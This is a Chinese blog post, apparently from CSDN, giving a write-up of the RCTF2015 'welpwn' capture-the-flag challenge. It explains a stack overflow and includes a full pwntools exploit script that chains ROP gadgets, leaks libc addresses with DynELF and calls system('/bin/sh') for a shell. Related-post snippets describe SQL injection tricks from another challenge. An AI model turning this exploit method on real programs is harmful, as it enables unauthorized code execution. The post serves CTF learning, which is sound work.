RCTF2015 welpwn: 200 writeup

最新推荐文章于 2024-03-19 07:00:00 发布
最新推荐文章于 2024-03-19 07:00:00 发布
阅读量2.3k 收藏
点赞数 1
分类专栏: XCTF-OJ 文章标签: rctf welpwn writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuchuangbob/article/details/51675320
版权

题目:http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b

最简单栈溢出,先read 1024字节,然后循环赋值导致栈溢出,循环到\0结束,因此需要构造ROP过掉\0限制:
0x0040089c: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
‘A’*24 + p64(0x0040089c) + p64(‘BBBBBBBB’)
0xBBBBBBBB会覆盖EIP,因此将BBBBBBBB替换为ROP链,泄露libc函数。由于没有rdx的gadget,因此无法调用参数超过两个以上的方法。因此使用puts进行泄露。

泄露出gets和system地址后,调用gets将/bin/sh存储在bss,然后再执行system,get shell。

from pwn import *
#context.log_level = 'debug'
sock = process('./welpwn')
print proc.pidof(sock)[0]

#0x0040089c: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 
ppppr = 0x40089c
puts_plt = 0x4005A0
poprdi = 0x004008a3
main = 0x4007CD

sock.recvn(16)

def peek(addr):
    rop = p64(poprdi) + p64(addr) + p64(puts_plt) + p64(main)
    sock.send('A'*24 + p64(ppppr) + rop)
    sock.recvn(27)
    str = sock.recvuntil('Welcome to RCTF\n')
    result = str.split('\nWelcome')[0]
    if result == '':
        return '\x00'
    return result

d = DynELF(peek, elf=ELF('./welpwn'))
system = int(d.lookup('system', 'libc'))
gets = int(d.lookup('gets', 'libc'))

print 'gets = 0x%x'%gets

bss_start = 0x601070
rop1 = p64(poprdi) + p64(bss_start) + p64(gets) + p64(poprdi) + p64(bss_start) + p64(system)

sock.send('A'*24 + p64(ppppr) + rop1)

sock.send('/bin/sh\0')

sock.interactive()
硬面饽饽
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2015_ransomware_writeup
06-23
周末勒索软件分析上周,我妻子的一位同事设法捕获了一个垃圾勒索软件; 我相信她是从一封与此类似的电子邮件中得到的: 我们公司的快递员无法派送包裹。 REASON: Postal code contains an error.DELIVERY STATUS: ...
[RCTF2015]EasySQL
m0_63253040的博客
07-22 807
反过来就是89-9b7f-46d3-acd4-732afd1243b7}显示没有这个字段,应该是前面没有把字段名字显示完全,用正则匹配。也不行,可能是二次注入,去重新注册一下。爆real_flag_1s_her字段。随便点一个发现url可能存在注入。使用reverse函数翻转字符串。进入环境,有一个注册和登录功能。假flag去users表看看。flag应该在后面用正则匹配。有报错了,我们使用报错注入。去登录注册看看能不能注入。发现在改密码的地方会报错。改密码123为1234。...
[RCTF2015]EasySQL ---不会编程的崽
最新发布
不会编程的崽的博客
03-19 780
sql注入 二次注入
Buuctf——[RCTF2015]EasySQL
m_de_g的博客
09-18 1055
1.当空格被过滤时,使用括号绕过()2.当and被过滤时,使用||过滤3.当被过滤时,使用reverse绕过——相当于把字符串反过来打印出来4.报错注入用法5.二次注入。
xdctf2015前20名writeup
10-07
2015年xdctf前20名的writeup,绝对不坑
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
ISCC2015 Writeup BASIC - Q7.docx
09-30
ISCC2015 Writeup BASIC - Q7.docx
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
[wp][RCTF2015]EasySQL
小飒的博客
07-05 378
有修改密码怀疑是2次注入 admin被注册 sqli-lab24关中遇到过二次注入 特地去看了下代码 一开始尝试admin’# 修改密码 admin还是登陆不上 使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化 试下报错注入 注册的时候发现有过滤 得到数据库名:web_sqli 得到表名article,flag,users 盲猜列名 flag 获得"~RCTF{Good job! But flag not her"疯了,只能试下别的表,希望不要是被我修改了的admin密码 real_
[RCTF2015]EasySQL 1
weixin_48083470的博客
07-17 652
[RCTF2015]EasySQL1 两个功能 1、登录 2、注册 第一个尝试 能注册,想到二次注入 先注册 试试 admin 发现已经存在 那么尝试更改admin的密码 注册 admin"# 登录后更改密码,成功,返回登录admin,成功 但是发现并没有什么软用 admin 和 普通用户没区别 第二个尝试 发现更改密码处可以报错 那么尝试报错注入 思路构造用户名,在更改密码的时候让其报错 ad"&&exists(select(extractvalue(1,concat('~',(selec
buu-[RCTF2015]EasySQL
qaq517384的博客
10-11 278
打开环境有两个选项 对注册的三个输入简单fuzz一下 除了过滤的基本都能用作用户名,包括反斜杠,单双引号 在正常登陆后,改密码时就可以看到由用户名不合法导致的报错 由报错语句:’"’" and pwd=‘c4ca4238a0b923820dcc509a6f75849b’’ 得到原本的sql应该是 update table set username="$username" and password='$newpassword' 这里就可以构造一个有关于报错注入的二次注入 通过我们构造的sql语句,在改
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值